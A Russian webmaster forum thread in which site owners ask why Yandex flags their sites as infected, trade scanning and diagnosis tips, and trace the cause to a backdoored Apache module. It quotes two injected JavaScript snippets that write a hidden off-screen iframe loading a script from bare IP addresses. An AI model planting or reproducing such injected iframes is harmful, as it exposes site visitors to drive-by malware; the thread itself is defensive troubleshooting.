- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Все что нужно знать о DDоS-атаках грамотному менеджеру
И как реагировать на "пожар", когда неизвестно, где хранятся "огнетушители
Антон Никонов
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Давайте вы начнете более адекватно реагировать, всё же вы пришли сюда за помощью...
http://www.revisium.com/ai/
Ну так сделайте, чтобы JS файлы отдавались через ПХП, в чем проблема?
В папку JS кидаем все файлы жабаскрипта. Ложим htaccess в эту папку, которому говорим, чтобы все обращения к этой директории кидал на index.php и в нем реализуем отдачу файлов.
Еще раз скажу - это не панацея, надо лечить от вирусов.
Вашими минусами от меня не убудет, но умнее вы от этого не станете...
TF-Studio, айболит это что? Антивирус или ?
тему "прилепленную" читали?
/ru/forum/774117
айболит - http://www.revisium.com/ai/
В каком файле вирус находит?
тему "прилепленную" читали?
/ru/forum/774117
айболит - http://www.revisium.com/ai/
В каком файле вирус находит?
/smartgifts/workspace/js/plugins.js
в нем нет вируса. Так же как и в других аналогичных файлах. Отсюда и возникла тема. Не может понять либо это скриптом делается, либо дырки в моделях веб-сервера. Интересно то, что яндекс находит вирусы, и сам подсказал где искать.
может и дырки.. /ru/forum/775005
---------- Post added 12-03-2013 at 20:00 ----------
Проверьте libkeyutils .. в зависимости от системы в разных (lib или lib64) местах лежать может
ivan-lev, в панели плекса просто нет доступа к системным файлам... либо плеск старый либо что, но такое ощущение что только пользовательский интерфейс, ничего нет то что связано с системой.
После переписки, сказали что возможно проблема в модулях веб-сервера
А с вероятностью в 95% не в них дело. Читайте сначала прилепленный топик про вирусы.
в панели плекса просто нет доступа
Эм.. а SSH на что?
Вообще, смотря под каким пользово
либо плеск старый
Если есть сомненья, значит старый... Админ, видимо, тоже Вы?
Хотя, я бы сначала причину в файлах сайта поискал..
---------- Post added 12-03-2013 at 20:13 ----------
Что характерно, файлы изменяются, но дата изменения файла не меняется...
У файла 3 даты.. если меняют скриптом, то, как правило только одну...
ctime atime mtime
atime сейчас уже вряд ли поможет.. а вот ctime ...
Кто-то сталкивался с таким: впс плеск, арендован у рбк, на сайте есть фрейворк expression engine.
Сколько времени на сайте провожу ни разу не заметил никакого вируса. Захожу и получаю предупреждение от яндекса, мол вирус на сайте. Пошел в вебмастер - говорят вирус. Идут смотреть не нашел ничего. Пишу ему, они сказали:
При проверке Вашего сайта антивирусный комплекс Яндекса обнаружил в js скрипте
вредоносный код следующего содержания:
document.write('<style>.x1vvy5fkyw { position:absolute; left:-1828px; top:-1060px} </style> <div class="x1vvy5fkyw"><iframe src="http://69.89.4.78/909a4fce9e610c7ad320e6942b37edf4/q.php" width="418" height="110"></iframe></div>')
посмотрел все файлы, не нашел ничего.
После переписки, сказали что возможно проблема в модулях веб-сервера, которые могут быть заражены либо иметь дырки, которые собственно и делают такие манипуляции с файлами. Что характерно, файлы изменяются, но дата изменения файла не меняется... Парадокс.
Сталкивался ли кто-то?
Всем доброго времени суток.
Аналогичная ситуация возникла буквально на днях, так и не справился с решением данной задачи... CMS DLE.
Yandex пишет:
document.write('<style>.idr3nt30ft { position:absolute; left:-1552px; top:-1565px} </style> <div class="idr3nt30ft"><iframe src=" http://65.75.171.190/8e75cb5ad37169f76282d79c2cfd0f29/q.php " width="214" height="214"></iframe></div>');
Мы подозреваем, что источник заражения может находится в модуле веб-сервера. Просмотреть список все модулей Вы можете в файле httpd.conf . Проверьте каждый файл модуля через сервис https://www.virustotal.com . Если какой-то из файлов данный сервис признает инфицированным - пришлите его нам в заархивированном виде с паролем, а пароль укажите в письме. Заранее спасибо за Вашу помощь.
Пытался найти данный код на сайте, не нашел подобного... Проверил все запускаемые модули, о которых говорит яндекс, и нашел один называется mod_preg_mem.so. При проверке на вирусы Касперский дал описание как HEUR:Backdoor.Linux.Apmod.gen. Проблема в том, что я не могу отключить этот модуль, нет доступа на изменение конфига этого модуля, хотя root права есть. В какую сторону копать не пойму.